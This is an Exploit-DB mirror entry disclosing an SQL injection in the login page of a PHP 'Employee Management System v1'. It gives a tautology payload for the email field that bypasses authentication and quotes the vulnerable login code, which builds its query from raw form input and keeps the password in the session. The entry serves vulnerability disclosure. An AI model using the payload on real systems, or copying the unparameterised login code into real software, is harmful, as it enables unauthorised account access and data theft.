bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51803.txt
Exploit-DB ba28fce174 DB: 2024-02-20 
9 changes to exploits/shellcodes/ghdb

SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration

Wondercms 4.3.2 - XSS to RCE

Employee Management System v1 - 'email' SQL Injection

JFrog Artifactory < 7.25.4 - Blind SQL Injection

phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit

XAMPP - Buffer Overflow POC
Microsoft Windows Defender - VBScript Detection Bypass
Microsoft Windows Defender Bypass - Detection Mitigation Bypass
2024-02-20 00:16:25 +00:00

71 lines
No EOL
2.1 KiB
Text
Raw Blame History

# Exploit Title: Employee Management System v1 - 'email' SQL Injection
# Google Dork: N/A
# Application: Employee Management System
# Date: 19.02.2024
# Bugs: SQL Injection
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
# Version: N/A
# Tested on: Windows 10 64 bit Wampserver
# CVE : N/A
## Vulnerability Description:
In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.
## Proof of Concept (PoC):
An example attacker could input the following into the email field instead of a valid email address:
In this case, the SQL query would look like:
SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active'
As "1=1" is always true, the query would return positive results, allowing the attacker to log in.
## Vulnerable code section:
====================================================
employee/Admin/login.php
<?php
session_start();
error_reporting(1);
include('../connect.php');
//Get website details
$sql_website = "select * from website_setting";
$result_website = $conn->query($sql_website);
$row_website = mysqli_fetch_array($result_website);
if(isset($_POST['btnlogin'])){
//Get Date
date_default_timezone_set('Africa/Lagos');
$current_date = date('Y-m-d h:i:s');
$email = $_POST['txtemail'];
$password = $_POST['txtpassword'];
$status = 'Active';
$sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."' and status = '".$status."'";
$result = mysqli_query($conn, $sql);
if (mysqli_num_rows($result) > 0) {
// output data of each row
($row = mysqli_fetch_assoc($result));
$_SESSION["email"] = $row['email'];
$_SESSION["password"] = $row['password'];
$_SESSION["phone"] = $row['phone'];
$firstname = $row['firstname'];
$_SESSION["firstname"] = $row['firstname'];
$fa = $row['2FA'];
}
Reference in a new issue View git blame Copy permalink